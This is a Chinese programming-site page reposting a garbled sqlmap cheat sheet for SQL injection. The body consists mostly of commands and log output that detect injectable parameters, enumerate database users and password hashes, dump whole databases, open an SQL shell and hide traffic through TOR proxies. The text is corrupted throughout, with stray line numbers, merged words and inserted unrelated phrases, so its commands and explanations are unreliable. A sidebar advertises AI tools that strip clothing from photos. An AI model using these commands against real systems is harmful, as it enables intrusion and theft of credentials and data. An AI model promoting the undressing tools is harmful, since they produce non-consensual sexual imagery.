首頁 資料庫 mysql教程 注入常用语句

注入常用语句

Jun 07, 2016 pm 05:44 PM
常用 注入 語句

注入常用语句 T users sinp 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissettnameisnull bunnyming 这个东西,是mickey整理的,不多说了,尊重一下原作者,转载注明mickey整理就好了 21 22 更新 23

注入常用语句

T users sinp> 4 web server operating system: Linux Ubuntu 8.10 (Intrepid Ibex) DBMS: PostgreSQL : users id blissett nameisnull bunny ming 这个东西,是mickey整理的,不多说了,香港服务器,尊重一下原作者,转载注明mickey整理就好了 21 22 更新 23 svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev m=1-v 1 –sql-shell //执行SQL语句 m更详细的信息 options from a configuration INI file 30 sqlmap -c sqlmap.conf 31 32 使用POST方法提交 sqlmap/oracle/post_int.php” –method POST –data “id=1使用COOKIES方式提交,cookie的值用;分割,可以使用TamperData来抓cookies sqlmap使用referer欺骗 sqlmap使用自定义user-agent,或者使用随机使用自带的user-agents.txt sqlmapagent “Mozillapython sqlmap.py sqlmapa “.agents.txt” 46 47 使用基本认证 sqlmap使用Digest认证 sqlmap使用代理,配合TOR sqlmap.1.47:3128sqlmap.1.47:8118 56 57 使用多线程猜解 sqlmap–threads 绕过动态检测,直接指定有注入点的参数,可以使用,分割多个参数,指定user-agent注入 sqlmapp “id sqlmapcatp “cat,id” sqlmapagent” –.7rc1 (http://sqlmap.sourceforge.net)” 64 65 指定数据库,绕过SQLMAP的自动检测 sqlmap/pgsql/get_int.php?id=1-v 2 –dbms “PostgreSQL” MySQL 69 * Oracle 70 * PostgreSQL 71 * Microsoft SQL Server 72 73 指定操作系统,绕过SQLMAP自动检测 sqlmap/pgsql/get_int.php?id=1-v 2 –os “Windows” Linux 77 * Windows 78 79 自定义payload 80 Options: –prefix and –postfix circumstances the vulnerable parameter is exploitable only if the user provides a postfix to be appended to the injection payload. Another scenario where these options come handy presents itself when the user already knows that query syntax and want to detect and exploit the SQL injection by directly providing a injection payload prefix and/or postfix. users . “‘) LIMIT 0, 1″;: .″ test” 87 88 [...] 89 [hh:mm:16] [INFO] testing sql injection on GET parameter ‘id’ with 0 parenthesis 90 [hh:mm:16] [INFO] testing custom injection on GET parameter ‘id’ 91 [hh:mm:16] [TRAFFIC OUT] HTTP request: 92 GET /sqlmap/mysql/get_str_brackets.php?id=1%27%29%20AND%207433=7433%20AND%20 93 %28%27test%27=%27test HTTP/1.1 94 Accept-charset: ISO-8859-15,utf-8;q=0.7,*;q=0.7 95 Host: 192.168.1.121:80 96 Accept-language: en-us,en;q=0.5 97 Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8, 98 image/png,*/*;q=0.5 99 User-agent: sqlmap/0.7rc1 () 100 Connection: close 101 [...] 102 [hh:mm:17] [INFO] GET parameter ‘id’ is custom injectable 103 [...] 104 105 As you can see, the injection payload for testing for custom injection is: 106 107 id=1%27%29%20AND%207433=7433%20AND%20%28%27test%27=%27test 108 109 which URL decoded is: test makes the query syntatically correct to the page query: users (‘test’='test’) LIMIT 0, 1 116 117 In this simple example, sqlmap could detect the SQL injection and exploit it without need to provide a custom injection payload, but sometimes in the real world application it is necessary to provide it. 118 119 页面比较 120 python sqlmap.py -u “?id=1″ –string “luther” -v 1 121 python sqlmap.py -u “?id=1″ –regexp “

lu[\w][\w]er” -v 122 123 排除网站的内容 124 python sqlmap.py -u “?id=1″ –excl-reg “Dynamic content: ([\d]+)” 125 126 多语句测试,php内嵌函数mysql_query(),不支持多语句 127 python sqlmap.py -u “?id=1″ –stacked-test -v 1 128 129 union注入测试 130 python sqlmap.py -u “?id=1″ –union-test -v 1 131 132 unionz注入配合orderby 133 python sqlmap.py -u “?id=1″ –union-test –union-tech orderby -v 1 134 135 python sqlmap.py -u “?id=1″ -v 1 –union-use –banner 136 python sqlmap.py -u “?id=1″ -v 5 –union-use –current-user 137 python sqlmap.py -u “?id=1″ -v 1 –union-use –dbs 138 139 fingerprint 140 python sqlmap.py -u “?id=1″ -v 1 -f 141 python sqlmap.py -u “?name=luther” -v 1 -f -b 142 143 判断当前用户是否是dba 144 python sqlmap.py -u “?id=1″ –is-dba -v 1 145 146 列举数据库用户 147 python sqlmap.py -u “?id=1″ –users -v 0 148 149 列举数据库用户密码 150 python sqlmap.py -u “?id=1″ –passwords -v 0 151 python sqlmap.py -u “?id=1″ –passwords -U sa -v 0 152 153 查看用户权限 154 python sqlmap.py -u “?id=1″ –privileges -v 0 155 python sqlmap.py -u “?id=1″ –privileges -U postgres -v 0 156 157 列数据库 158 python sqlmap.py -u “?id=1″ –dbs -v 0 159 160 列出指定数据库指定表的列名 161 python sqlmap.py -u “?id=1″ –columns -T users -D test -v 1 162 163 列出指定数据库的指定表的指定列的内容 164 python sqlmap.py -u “?id=1″ –dump -T users -D master -C surname -v 0 165 166 指定列的范围从2-4 167 python sqlmap.py -u “?id=1″ –dump -T users -D test –start 2 –stop 4 -v 0 168 169 导出所有数据库,所有表的内容 170 python sqlmap.py -u “?id=1″ –dump-all -v 0 171 172 只列出用户自己新建的数据库和表的内容 173 python sqlmap.py -u “?id=1″ –dump-all –exclude-sysdbs -v 0 174 175 sql query 176 python sqlmap.py -u “?id=1″ –sql-query “SELECT usename FROM pg_user” -v 0 177 python sqlmap.py -u “?id=1″ –sql-query “SELECT host, password FROM mysql.user LIMIT 1, 3″ -v 1 178 179 SELECT usename, passwd FROM pg_shadow ORDER BY usename 180 181 保存和恢复会话 182 python sqlmap.py -u “?id=1″ -b -v 1 -s “sqlmap.log” 183 184 保存选项到INC配置文件 185 python sqlmap.py -u “?id=1″ -b -v 1 –save ===================================================== 2、sqlmap -g "关键词“ //这是通过google搜索注入,现在还不可以,不知道是什么原因,网站空间,可以直接修改为百度 194 3、 195 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 [hh:mm:25] [INFO] testing if the url is stable, wait a few seconds 199 [hh:mm:26] [INFO] url is stable id' is dynamic id' is dynamic id' is dynamic id' 204 [hh:mm:26] [INFO] testing numeric/unescaped injection on GET parameter [hh:mm:26] [INFO] confirming numeric/unescaped injection on GET idid' is numeric/unescaped injectable 209 [hh:mm:26] [INFO] testing MySQL ) 211 [hh:mm:26] [INFO] retrieved: 55 212 [hh:mm:26] [INFO] performed 20 queries in 0 seconds 213 [hh:mm:26] [INFO] confirming MySQL ) 215 [hh:mm:26] [INFO] retrieved: 1 216 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 217 [hh:mm:26] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 218 0, 1 219 [hh:mm:26] [INFO] retrieved: 5 220 [hh:mm:26] [INFO] performed 13 queries in 0 seconds 221 remote DBMS: MySQL >= 5.0.0 4、指定参数注入 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 228 -p "id" [hh:mm:17] [INFO] testing if the url is stable, wait a few seconds 232 [hh:mm:18] [INFO] url is stable id' 234 [hh:mm:18] [INFO] testing numeric/unescaped injection on parameter [hh:mm:18] [INFO] confirming numeric/unescaped injection on idid' is numeric/unescaped injectable 239 [...] Or if you want to provide more than one parameter, for instance: $ python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 246 1 -p "cat,id" 5、指定方法和post的数据 250 python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" -- 251 data "id=1&cat=2" 6、指定cookie,可以注入一些需要登录的地址 255 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --cookie 256 "COOKIE_VALUE" 7、通过代理注入 260 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy 261 "http://127.0.0.1:8118" 262 8、指定关键词,香港服务器,也可以不指定。程序会根据返回结果的hash自动判断 263 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string 264 "STRING_ON_TRUE_PAGE" 265 9、指定数据,这样就不用猜测其他的数据库里。可以提高效率。 266 --remote-dbms 267 10、指纹判别数据库类型 268 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f 269 11、获取banner信息 270 python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -b .

 

posted on

本網站聲明
本文內容由網友自願投稿,版權歸原作者所有。本站不承擔相應的法律責任。如發現涉嫌抄襲或侵權的內容,請聯絡admin@php.cn

熱AI工具

Undresser.AI Undress

Undresser.AI Undress

人工智慧驅動的應用程序,用於創建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用於從照片中去除衣服的線上人工智慧工具。

Undress AI Tool

Undress AI Tool

免費脫衣圖片

Clothoff.io

Clothoff.io

AI脫衣器

Video Face Swap

Video Face Swap

使用我們完全免費的人工智慧換臉工具,輕鬆在任何影片中換臉!

熱門文章

<🎜>:泡泡膠模擬器無窮大 - 如何獲取和使用皇家鑰匙
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
北端:融合系統,解釋
3 週前 By 尊渡假赌尊渡假赌尊渡假赌
Mandragora:巫婆樹的耳語 - 如何解鎖抓鉤
3 週前 By 尊渡假赌尊渡假赌尊渡假赌

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的程式碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

強大的PHP整合開發環境

Dreamweaver CS6

Dreamweaver CS6

視覺化網頁開發工具

SublimeText3 Mac版

SublimeText3 Mac版

神級程式碼編輯軟體(SublimeText3)

熱門話題

Java教學
1665
14
CakePHP 教程
1424
52
Laravel 教程
1322
25
PHP教程
1270
29
C# 教程
1250
24
學習canvas框架 詳解常用的canvas框架 學習canvas框架 詳解常用的canvas框架 Jan 17, 2024 am 11:03 AM

探索Canvas框架:了解常用的Canvas框架有哪些,需要具體程式碼範例引言:Canvas是HTML5中提供的一個繪圖API,透過它我們可以實現豐富的圖形和動畫效果。為了提高繪圖的效率和便利性,許多開發者開發了不同的Canvas框架。本文將介紹一些常用的Canvas框架,並提供具體程式碼範例,以幫助讀者更深入地了解這些框架的使用方法。一、EaselJS框架Ea

Spring註解大揭秘:常用註解解析 Spring註解大揭秘:常用註解解析 Dec 30, 2023 am 11:28 AM

Spring是一個開源框架,提供了許多註解來簡化和增強Java開發。本文將詳細解釋常用的Spring註解,並提供具體的程式碼範例。 @Autowired:自動組裝@Autowired註解可以用於自動組裝Spring容器中的Bean。當我們在需要依賴的地方使用@Autowired註解時,Spring將會在容器中尋找匹配的Bean並自動注入。範例程式碼如下:@Auto

PHP常用的加密演算法有哪些? PHP常用的加密演算法有哪些? May 12, 2023 pm 06:51 PM

隨著網路的發展,資料安全已成為我們日常工作中必須關注的嚴肅議題。針對敏感的個人資訊或商業數據,加密變得特別重要。在PHP開發中,有些加密演算法被廣泛應用,下面我們就來了解PHP常用的加密演算法。一、Base64編碼Base64編碼常用於在網頁傳輸或郵件中傳輸二進位數據,因為網頁或郵件只能傳送發送字串類型數據,不能直接傳輸二進位數據。 Base64就是一種解

15個常用的幣圈逃頂指標技術分析 15個常用的幣圈逃頂指標技術分析 Mar 03, 2025 pm 05:48 PM

十五大比特幣逃頂指標深度解析:2025年市場展望本文深入分析了十五個常用的比特幣逃頂指標,其中比特幣Rhodl比率、USDT活期理財和山寨幣季節指數已於2024年觸及逃頂區間,引發市場關注。面對潛在風險,投資者該如何應對?讓我們逐一解讀這些指標,並探討合理的應對策略。一、關鍵指標詳解AHR999囤幣指標:由ahr999創建,輔助比特幣定投策略。當前值為1.21,處於觀望區間,建議謹慎。鏈接AHR999逃頂指標:AHR999囤幣指標的補充,用於識別市場頂部。當前值為2.48,本週

Go語言中常用的函數有哪些? Go語言中常用的函數有哪些? Mar 28, 2024 pm 02:45 PM

Go語言中常用的函數有哪些? ————探究Go語言中常用的函數及其用法作為一門流行的靜態型別程式語言,Go語言廣泛應用於各種領域,如伺服器端開發、網路程式設計、雲端運算等。在Go語言中,函數作為基本的程式碼組織單元,是程式運作的重要組成部分。本文將探討Go語言中常用的函數及其用法,幫助讀者更掌握這門語言的核心特性。一、函數宣告與呼叫函數在Go語言中以關鍵字"fun

Oracle資料庫常用資料類型介紹 Oracle資料庫常用資料類型介紹 Mar 08, 2024 am 09:45 AM

Oracle資料庫是一種常用的關聯式資料庫管理系統,它支援多種資料類型以滿足不同的需求。在使用Oracle資料庫時,了解資料庫的資料類型是非常重要的。本文將介紹Oracle資料庫中常用的資料類型,並附帶具體的程式碼範例。一、數值型資料型別NUMBERNUMBER是Oracle資料庫中最常用的數值型資料型別,用於儲存整數或浮點數。 NUMBER資料型別可以指定精度

PHP8.0中的multi-catch語句 PHP8.0中的multi-catch語句 May 14, 2023 pm 01:51 PM

隨著Web應用程式的發展,PHP語言在Web開發中得到了廣泛應用。而在PHP8.0版本中,一個新的語言特性被引入-multi-catch語句。什麼是multi-catch語句?在先前的PHP版本中,對於多個異常類型的處理,開發人員需要寫多個catch語句。例如,如下程式碼區塊展示了兩種不同異常的處理:try{//Somecodethatmay

哪個在DevOps中比較常用:Ruby還是Python? 哪個在DevOps中比較常用:Ruby還是Python? Aug 19, 2023 am 11:41 AM

軟體開發領域在很長一段時間內發生了巨大變化,DevOps已成為現代電腦程式交付過程中的基本組成部分。為了簡化電腦程式開發和營運的過程,DevOps培養了一種合作、持續整合和不間斷交付的文化。程式語言的選擇在DevOps的高效利用中起著重要作用,而在這個領域中兩個知名的競爭者是Ruby和Python。在這裡,我們將研究Ruby和Python在DevOps環境中的選擇、流行度和使用案例。我們將調查它們獨特的特點、優點和缺點,以幫助您決定哪種語言最適合您的DevOps需求。第一節:Ruby和Pytho

See all articles